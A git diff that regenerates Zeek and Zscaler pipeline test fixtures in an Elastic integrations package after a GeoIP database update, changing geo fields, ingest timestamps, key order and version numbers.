"{\"ts\":1547688736.80509,\"uid\":\"C3mki91FnnNtm0u1ok\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63198,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"Fue9H32OmuitQk2zR\",\"FpbiBP215tk2xftxM6\",\"FEdROj1vUzTGw3BIUa\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -259,14 +259,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -364,7 +364,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T13:51:13.148722600Z", + "ingested": "2021-12-14T14:59:24.817284673Z", "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -385,14 +385,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -447,7 +447,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T13:51:13.148729700Z", + "ingested": "2021-12-14T14:59:24.817285055Z", "original": "{\"ts\":1617091251.151303,\"uid\":\"CLQiVH1VcpvT3ruEak\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":52730,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_CHACHA20_POLY1305_SHA256\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -483,14 +483,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -528,7 +528,7 @@ "resumed": false }, "event": { - "ingested": "2021-12-09T13:51:13.148735100Z", + "ingested": "2021-12-14T14:59:24.817285438Z", "original": "{\"ts\":1617090955.826099,\"uid\":\"CBiXOC4IqYxMv1xzf9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":52678,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -564,14 +564,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -609,7 +609,7 @@ "resumed": false }, "event": { - "ingested": "2021-12-09T13:51:13.148740400Z", + "ingested": "2021-12-14T14:59:24.817285822Z", "original": "{\"ts\":1617091253.726384,\"uid\":\"C4jH9IqWGZwc1PPUh\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53368,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"tickets.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -645,14 +645,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -690,7 +690,7 @@ "resumed": false }, "event": { - "ingested": "2021-12-09T13:51:13.148744300Z", + "ingested": "2021-12-14T14:59:24.817286200Z", "original": "{\"ts\":1617091253.91861,\"uid\":\"CXVMSq6Dainy4WFN9\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53382,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"rundeck.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -711,14 +711,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -783,7 +783,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T13:51:13.148748600Z", + "ingested": "2021-12-14T14:59:24.817286595Z", "original": "{\"ts\":1617091254.325291,\"uid\":\"CsgtQe4AikDZBsIM6k\",\"id.orig_h\":\"10.156.0.2\",\"id.orig_p\":55120,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256\",\"curve\":\"secp256r1\",\"resumed\":false,\"established\":false,\"cert_chain_fuids\":[\"FeyRIk4nUtwwcUcnRf\"],\"client_cert_chain_fuids\":[],\"validation_status\":\"self signed certificate\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -819,14 +819,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -864,7 +864,7 @@ "resumed": false }, "event": { - "ingested": "2021-12-09T13:51:13.148753700Z", + "ingested": "2021-12-14T14:59:24.817286971Z", "original": "{\"ts\":1617091255.065602,\"uid\":\"CPGhJS3UPpcnR96NQc\",\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":53095,\"id.resp_h\":\"10.156.0.2\",\"id.resp_p\":443,\"server_name\":\"splunk-api.swiftcrypto.com\",\"resumed\":false,\"established\":false}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -890,14 +890,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -998,7 +998,7 @@ "version_protocol": "tls" }, "event": { - "ingested": "2021-12-09T13:51:13.148758300Z", + "ingested": "2021-12-14T14:59:24.817287346Z", "original": "{\"ts\":1547688736.805527,\"uid\":\"CfGBt82PzCXzHa0iek\",\"id.orig_h\":\"10.178.98.102\",\"id.orig_p\":63197,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":9243,\"version\":\"TLSv12\",\"cipher\":\"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384\",\"curve\":\"secp256r1\",\"server_name\":\"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FiFLYv3UjeWyv2gcW\",\"FvSsiB1Xi816EMagI9\",\"FWpPS4mjGaAhTRXLf\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=*.gcp.cloud.es.io,O=Elasticsearch\\u005c, Inc.,L=Mountain View,ST=California,C=US\",\"issuer\":\"CN=DigiCert SHA2 Secure Server CA,O=DigiCert Inc,C=US\",\"validation_status\":\"ok\"}{\"ts\":1602179457.352156,\"uid\":\"CK17Dl2SB8bZOVonSl\",\"id.orig_h\":\"10.0.0.1\",\"id.orig_p\":49228,\"id.resp_h\":\"192.168.50.1\",\"id.resp_p\":443,\"version\":\"TLSv12\",\"cipher\":\"TLS_RSA_WITH_AES_128_CBC_SHA256\",\"resumed\":false,\"established\":true,\"cert_chain_fuids\":[\"FOLwYQ6rs70bIMSf9\"],\"client_cert_chain_fuids\":[],\"subject\":\"CN=foo,OU=foo@bar,O=org,L=locality,C=LO\",\"issuer\":\"CN=CA,OU=CA@example.com,O=Example Corp,L=foo,C=HI\",\"validation_status\":\"self signed certificate\",\"ja3\":\"74927e242d6c3febf8cb9cab10a7f889\",\"ja3s\":\"80b3a14bccc8598a1f3bbe83e71f735f\",\"resp_certificate_sha1\":\"5dad8b55621b6b9c30679d9d61248dd132a83c94\",\"not_valid_before\":1562022421,\"not_valid_after\":1577748224}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", diff --git a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json index d5324a0a333..61d591e6228 100644 --- a/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json +++ b/packages/zeek/data_stream/stats/_dev/test/pipeline/test-stats.log-expected.json @@ -54,7 +54,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:15.427176300Z", + "ingested": "2021-12-14T14:59:27.044634527Z", "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "metric" @@ -125,7 +125,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:15.427184700Z", + "ingested": "2021-12-14T14:59:27.044637383Z", "original": "{\"ts\":1476605878.714844,\"peer\":\"bro\",\"mem\":94,\"pkts_proc\":296,\"bytes_recv\":39674,\"events_proc\":723,\"events_queued\":728,\"active_tcp_conns\":1,\"active_udp_conns\":3,\"active_icmp_conns\":0,\"tcp_conns\":6,\"udp_conns\":36,\"icmp_conns\":2,\"timers\":797,\"active_timers\":38,\"files\":0,\"active_files\":0,\"dns_requests\":0,\"active_dns_requests\":0,\"reassem_tcp_size\":0,\"reassem_file_size\":0,\"reassem_frag_size\":0,\"reassem_unknown_size\":0}", "created": "2020-04-28T11:07:58.223Z", "kind": "metric" diff --git a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json index 0e2655f1e89..ff8c15b1393 100644 --- a/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json +++ b/packages/zeek/data_stream/traceroute/_dev/test/pipeline/test-traceroute.log-expected.json @@ -14,14 +14,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -39,7 +39,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:51:15.714980100Z", + "ingested": "2021-12-14T14:59:27.298267374Z", "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}", "category": [ "network" @@ -66,14 +66,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -110,7 +110,7 @@ "name": "Lees-MBP.localdomain" }, "event": { - "ingested": "2021-12-09T13:51:15.714984Z", + "ingested": "2021-12-14T14:59:27.298270323Z", "original": "{\"ts\":1361916158.650605,\"src\":\"192.168.1.1\",\"dst\":\"89.160.20.156\",\"proto\":\"udp\"}", "category": [ "network" diff --git a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json index 72d89700b42..bf37a3dfe84 100644 --- a/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json +++ b/packages/zeek/data_stream/tunnel/_dev/test/pipeline/test-tunnel.log-expected.json @@ -13,14 +13,14 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -42,14 +42,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -63,7 +63,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-09T13:51:16.028946100Z", + "ingested": "2021-12-14T14:59:27.604686278Z", "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -80,22 +80,34 @@ ] }, { + "@timestamp": "2018-12-10T01:34:26.743Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "89.160.20.156" + ] + }, "log": { "file": { "path": "/usr/local/var/log/zeek/tunnel.log" } }, + "host": { + "name": "Lees-MBP.localdomain" + }, "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -117,14 +129,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -137,23 +149,8 @@ "port": 0, "ip": "89.160.20.156" }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2018-12-10T01:34:26.743Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "89.160.20.156" - ] - }, - "host": { - "name": "Lees-MBP.localdomain" - }, "event": { - "ingested": "2021-12-09T13:51:16.028954900Z", + "ingested": "2021-12-14T14:59:27.604689192Z", "original": "{\"ts\":1544405666.743509,\"id.orig_h\":\"89.160.20.156\",\"id.orig_p\":0,\"id.resp_h\":\"89.160.20.156\",\"id.resp_p\":8080,\"tunnel_type\":\"Tunnel::HTTP\",\"action\":\"Tunnel::DISCOVER\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -164,7 +161,10 @@ "type": [ "connection" ] - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json index 519d8c92459..13654e30aab 100644 --- a/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json +++ b/packages/zeek/data_stream/weird/_dev/test/pipeline/test-weird.log-expected.json @@ -30,7 +30,7 @@ "ip": "192.168.1.1" }, "event": { - "ingested": "2021-12-09T13:51:16.462556600Z", + "ingested": "2021-12-14T14:59:28.025834867Z", "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -59,7 +59,7 @@ } }, "event": { - "ingested": "2021-12-09T13:51:16.462595Z", + "ingested": "2021-12-14T14:59:28.025837639Z", "original": "{\"ts\":1580227259.342809,\"name\":\"non_ip_packet_in_ethernet\",\"notice\":false,\"peer\":\"ens3f1-4\"}", "category": [ "network" @@ -75,11 +75,24 @@ ] }, { + "@timestamp": "2018-12-03T22:59:59.993Z", + "ecs": { + "version": "1.12.0" + }, + "related": { + "ip": [ + "192.168.1.1", + "192.168.1.2" + ] + }, "log": { "file": { "path": "/usr/local/var/log/zeek/weird.log" } }, + "host": { + "name": "Lees-MBP.localdomain" + }, "destination": { "port": 53, "address": "192.168.1.2", @@ -98,24 +111,8 @@ "address": "192.168.1.1", "ip": "192.168.1.1" }, - "tags": [ - "preserve_original_event" - ], - "@timestamp": "2018-12-03T22:59:59.993Z", - "ecs": { - "version": "1.12.0" - }, - "related": { - "ip": [ - "192.168.1.1", - "192.168.1.2" - ] - }, - "host": { - "name": "Lees-MBP.localdomain" - }, "event": { - "ingested": "2021-12-09T13:51:16.462601800Z", + "ingested": "2021-12-14T14:59:28.025838095Z", "original": "{\"ts\":1543877999.99354,\"uid\":\"C1ralPp062bkwWt4e\",\"id.orig_h\":\"192.168.1.1\",\"id.orig_p\":64521,\"id.resp_h\":\"192.168.1.2\",\"id.resp_p\":53,\"name\":\"dns_unmatched_reply\",\"notice\":false,\"peer\":\"worker-6\"}", "created": "2020-04-28T11:07:58.223Z", "kind": "event", @@ -126,7 +123,10 @@ "type": [ "info" ] - } + }, + "tags": [ + "preserve_original_event" + ] } ] } \ No newline at end of file diff --git a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json index 1d15735c259..8a6a8b0cdb8 100644 --- a/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json +++ b/packages/zeek/data_stream/x509/_dev/test/pipeline/test-x509.log-expected.json @@ -210,7 +210,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-12-09T13:51:16.805683700Z", + "ingested": "2021-12-14T14:59:28.363491145Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ @@ -441,7 +441,7 @@ "session_id": "FxZ6gZ3YR6vFlIocq3" }, "event": { - "ingested": "2021-12-09T13:51:16.805692200Z", + "ingested": "2021-12-14T14:59:28.363493315Z", "original": "{\"ts\":1543867200.143484,\"id\":\"FxZ6gZ3YR6vFlIocq3\",\"certificate.version\":3,\"certificate.serial\":\"2D00003299D7071DB7D1708A42000000003299\",\"certificate.subject\":\"CN=www.bing.com\",\"certificate.issuer\":\"CN=Microsoft IT TLS CA 5,OU=Microsoft IT,O=Microsoft Corporation,L=Redmond,ST=Washington,C=US\",\"certificate.not_valid_before\":1500572828.0,\"certificate.not_valid_after\":1562780828.0,\"certificate.key_alg\":\"rsaEncryption\",\"certificate.sig_alg\":\"sha256WithRSAEncryption\",\"certificate.key_type\":\"rsa\",\"certificate.key_length\":2048,\"certificate.exponent\":\"65537\",\"san.dns\":[\"www.bing.com\",\"dict.bing.com.cn\",\"*.platform.bing.com\",\"*.bing.com\",\"bing.com\",\"ieonline.microsoft.com\",\"*.windowssearch.com\",\"cn.ieonline.microsoft.com\",\"*.origin.bing.com\",\"*.mm.bing.net\",\"*.api.bing.com\",\"ecn.dev.virtualearth.net\",\"*.cn.bing.net\",\"*.cn.bing.com\",\"ssl-api.bing.com\",\"ssl-api.bing.net\",\"*.api.bing.net\",\"*.bingapis.com\",\"bingsandbox.com\",\"feedback.microsoft.com\",\"insertmedia.bing.office.net\",\"r.bat.bing.com\",\"*.r.bat.bing.com\",\"*.dict.bing.com.cn\",\"*.dict.bing.com\",\"*.ssl.bing.com\",\"*.appex.bing.com\",\"*.platform.cn.bing.com\",\"wp.m.bing.com\",\"*.m.bing.com\",\"global.bing.com\",\"windowssearch.com\",\"search.msn.com\",\"*.bingsandbox.com\",\"*.api.tiles.ditu.live.com\",\"*.ditu.live.com\",\"*.t0.tiles.ditu.live.com\",\"*.t1.tiles.ditu.live.com\",\"*.t2.tiles.ditu.live.com\",\"*.t3.tiles.ditu.live.com\",\"*.tiles.ditu.live.com\",\"3d.live.com\",\"api.search.live.com\",\"beta.search.live.com\",\"cnweb.search.live.com\",\"dev.live.com\",\"ditu.live.com\",\"farecast.live.com\",\"image.live.com\",\"images.live.com\",\"local.live.com.au\",\"localsearch.live.com\",\"ls4d.search.live.com\",\"mail.live.com\",\"mapindia.live.com\",\"local.live.com\",\"maps.live.com\",\"maps.live.com.au\",\"mindia.live.com\",\"news.live.com\",\"origin.cnweb.search.live.com\",\"preview.local.live.com\",\"search.live.com\",\"test.maps.live.com\",\"video.live.com\",\"videos.live.com\",\"virtualearth.live.com\",\"wap.live.com\",\"webmaster.live.com\",\"webmasters.live.com\",\"www.local.live.com.au\",\"www.maps.live.com.au\"]}", "id": "FxZ6gZ3YR6vFlIocq3", "type": [ diff --git a/packages/zeek/manifest.yml b/packages/zeek/manifest.yml index 7b53a4ae2eb..a7b01be05b8 100644 --- a/packages/zeek/manifest.yml +++ b/packages/zeek/manifest.yml @@ -1,6 +1,6 @@ name: zeek title: Zeek Logs -version: 1.5.1 +version: 1.5.2 release: ga description: Collect and parse logs from Zeek network security with Elastic Agent. type: integration diff --git a/packages/zscaler/changelog.yml b/packages/zscaler/changelog.yml index d6914e3b9a8..97c2b1e1176 100644 --- a/packages/zscaler/changelog.yml +++ b/packages/zscaler/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.4.5" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.4.4" changes: - description: Uniform with guidelines diff --git a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json index 16cc51ef226..4845de1665e 100644 --- a/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json +++ b/packages/zscaler/data_stream/zia/_dev/test/pipeline/test-generated.log-expected.json @@ -1,1200 +1,1200 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "iusm ZSCALERNSS: time=modtempo Jan 29 6:09:59 2016^^timezone=GMT+02:00^^action=Blocked^^reason=failure^^hostname=rci737.www5.example^^protocol=tcp^^serverip=10.206.191.17^^url=https://api.example.com/ivelitse/ritin.htm?utl=vol#amremap^^urlcategory=oremi^^urlclass=ntsunti^^dlpdictionaries=nseq^^dlpengine=itinvol^^filetype=psa^^threatcategory=umq^^threatclass=ntium^^pagerisk=psaq^^threatname=cer^^clientpublicIP=reveri^^ClientIP=10.176.10.114^^location=lupt^^refererURL=https://internal.example.org/sequa/abo.gif?umqui=reeufugi#mdolo^^useragent=Opera/9.80 (Series 60; Opera Mini/7.1.32444/174.101; U; ru) Presto/2.12.423 Version/12.16^^department=sperna^^user=sumdo^^event_id=litesse^^clienttranstime=orev^^requestmethod=pisciv^^requestsize=1884^^requestversion=deF^^status=sist^^responsesize=1803^^responseversion=doeiu^^transactionsize=3942", "event": { - "ingested": "2021-06-14T08:26:19.844685200Z" + "ingested": "2021-12-14T14:59:54.590713416Z" + }, + "ecs": { + "version": 